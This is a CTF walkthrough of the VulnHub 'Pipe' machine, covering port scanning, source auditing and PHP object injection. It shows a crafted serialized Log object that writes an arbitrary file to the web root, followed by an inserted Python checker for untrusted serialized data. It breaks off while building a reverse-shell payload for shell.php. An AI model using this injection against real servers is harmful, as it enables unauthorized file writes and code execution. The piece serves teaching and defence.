Solving the Pipe challenge from VulnHub
Today I will show you how to solve the Pipe challenge from VulnHub.
Of course, a CTF is all about the line of reasoning, and the reasoning in this article is not necessarily the best one. You are welcome to download this challenge at the end of the article!
Enumeration
PORT      STATE SERVICE REASON  VERSION
22/tcp    open  ssh     syn-ack OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   1024 16:48:50:89:e7:c9:1f:90:ff:15:d8:3e:ce:ea:53:8f (DSA)
|   2048 ca:f9:85:be:d7:36:47:51:4f:e6:27:84:72:eb:e8:18 (RSA)
|_  256 d8:47:a0:87:84:b2:eb:f5:be:fc:1c:f1:c9:7f:e3:52 (ECDSA)
80/tcp    open  http    syn-ack Apache httpd
| http-auth:
| HTTP/1.1 401 Unauthorized
|_  Basic realm=index.php
|_http-server-header: Apache
|_http-title: 401 Unauthorized
111/tcp   open  rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          42192/udp  status
|_  100024  1          47286/tcp  status
47286/tcp open  status  syn-ack 1 (RPC #100024)
MAC Address: 00:0C:29:05:96:3D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Uptime guess: 199.640 days (since Sat May 9 04:40:31 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service Enumeration
HTTP Enumeration
Running OWASP DirBuster against port 80 reveals the JavaScript and PHP files under /scriptz/.
Source code Audit
Inspecting php.js:
The serialize function appears in the source of php.js. Note the examples at the end of its header comment:
function serialize(mixed_value) {
  // discuss at: http://phpjs.org/functions/serialize/
  // original by: Arpad Ray (mailto:arpad@php.net)
  // improved by: Dino
  // improved by: Le Torbi (http://www.letorbi.de/)
  // improved by: Kevin van Zonneveld (http://kevin.vanzonneveld.net/)
  // bugfixed by: Andrej Pavlovic
  // bugfixed by: Garagoth
  // bugfixed by: Russell Walker (http://www.nbill.co.uk/)
  // bugfixed by: Jamie Beck (http://www.terabit.ca/)
  // bugfixed by: Kevin van Zonneveld (http://kevin.vanzonneveld.net/)
  // bugfixed by: Ben (http://benblume.co.uk/)
  // input by: DtTvB (http://dt.in.th/2008-09-16.string-length-in-bytes.h
  // input by: Martin (http://www.erlenwiese.de/)
  // note: We feel the main purpose of this function should be to ease the transport of data between php & js
  // note: Aiming for PHP-compatibility, we have to translate objects to arrays
  // example 1: serialize(['Kevin', 'van', 'Zonneveld']);
  // returns 1: 'a:3:{i:0;s:5:"Kevin";i:1;s:3:"van";i:2;s:9:"Zonneveld";}'
  // example 2: serialize({firstName:'Kevin', midName: 'van', surName:'Zonneveld'});
  // returns 2: 'a:3:{s:9:"firstName";s:5:"Kevin";s:7:"midName";s:3:"van";s:7:"surName";s:9:"Zonneveld";}'
log.php.bak
Auditing this backup of the source shows that the application works with objects serialized in the same format that php.js produces.
Burp Suite: the POST request
Modify the POST request and submit it to index.php.
Burp then shows the serialized object:
Decoding the string
Select the string and right-click to send it to Decoder.
Click Smart decode.
Using the previously discovered php.js, the serialization format can be worked out, in particular the length prefix that precedes every string.
Paste the modified string into Burp:
O:3:"Log":2:{s:8:"filename";s:30:"/var/www/html/scriptz/Meh1.txt";s:4:"data";s:12:"HighOnCoffee";}
URL-encode the string with Burp Decoder and send it with Burp Repeater.
Checking the scriptz directory confirms that the file Meh1.txt was created and contains the text HighOnCoffee.
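The length prefixes the writeup has to recompute are exactly what a defender can check before data ever reaches unserialize(). Below is an added Python example (not code from the writeup or from the Pipe VM) that parses PHP's serialize() format and reports why a request body like the one above should be rejected; the PhpUnserializer and inspect_untrusted names, the WEB_EXEC list and the SAMPLE_BODY constant are this example's own constructions.

```python
from collections import namedtuple
PhpObject = namedtuple('PhpObject', 'cls props')   # result of an O:len:"Class":n:{...} token
class PhpUnserializer:            # recursive-descent reader for serialize() types N, i, b, s, a, O
    def __init__(self, data: str):
        self.s, self.i = data.encode('utf-8').decode('latin-1'), 0   # lengths count bytes: one char per byte
    def _until(self, ch):         # token up to ch; consumes ch
        j = self.s.index(ch, self.i); tok, self.i = self.s[self.i:j], j + 1
        return tok
    def _quoted(self):            # N:"text", N being the declared byte length
        n = int(self._until(':'))
        if self.s[self.i] != '"' or self.s[self.i + 1 + n] != '"':
            raise ValueError('declared length does not match the quoted text')
        val, self.i = self.s[self.i + 1:self.i + 1 + n], self.i + n + 3  # quotes + ';' or ':'
        return val
    def _pairs(self, n):          # n key/value pairs between '{' and '}'
        self.i, d = self.i + 1, {}
        for _ in range(n):
            k = self.parse(); d[k] = self.parse()   # key is parsed before its value
        self.i += 1
        return d
    def parse(self):
        t = self.s[self.i]; self.i += 2   # type letter plus ':' (or ';' for N)
        if t == 'N': return None
        if t in 'ib': return int(self._until(';'))
        if t == 's': return self._quoted()
        if t == 'a': return self._pairs(int(self._until(':')))
        if t == 'O': return PhpObject(self._quoted(), self._pairs(int(self._until(':'))))
        raise ValueError(f'unsupported token {t!r} at offset {self.i - 2}')

WEB_EXEC = ('.php', '.phtml', '.phar')   # extensions the web server hands to the PHP engine
# constructed sample: the request body from the writeup, before URL encoding
SAMPLE_BODY = 'O:3:"Log":2:{s:8:"filename";s:30:"/var/www/html/scriptz/Meh1.txt";s:4:"data";s:12:"HighOnCoffee";}'
def inspect_untrusted(raw: str) -> list:
    """Reasons to reject a request body before it ever reaches unserialize()."""
    try:
        value = PhpUnserializer(raw).parse()
    except (ValueError, IndexError) as e:
        return [f'malformed serialized data: {e}']
    findings = []
    def walk(v):
        if isinstance(v, PhpObject):
            findings.append(f'instantiates class {v.cls}')
            fn = v.props.get('filename')
            if isinstance(fn, str) and fn.lower().endswith(WEB_EXEC):
                findings.append(f'filename names a server-executable file: {fn}')
            v = v.props
        if isinstance(v, dict):
            for item in v.values(): walk(item)
    walk(value)
    return findings
```

In PHP itself the equivalent guard is unserialize($data, ['allowed_classes' => false]) (PHP 7 and later), or simply not accepting serialized objects from the client at all.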
Reverse Shell Injection
Burp Decoder is used to encode the following string:
O:3:"Log":2:{s:8:"filename";s:31:"/var/www/html/scriptz/shell.php";s:4:"data";s:60:"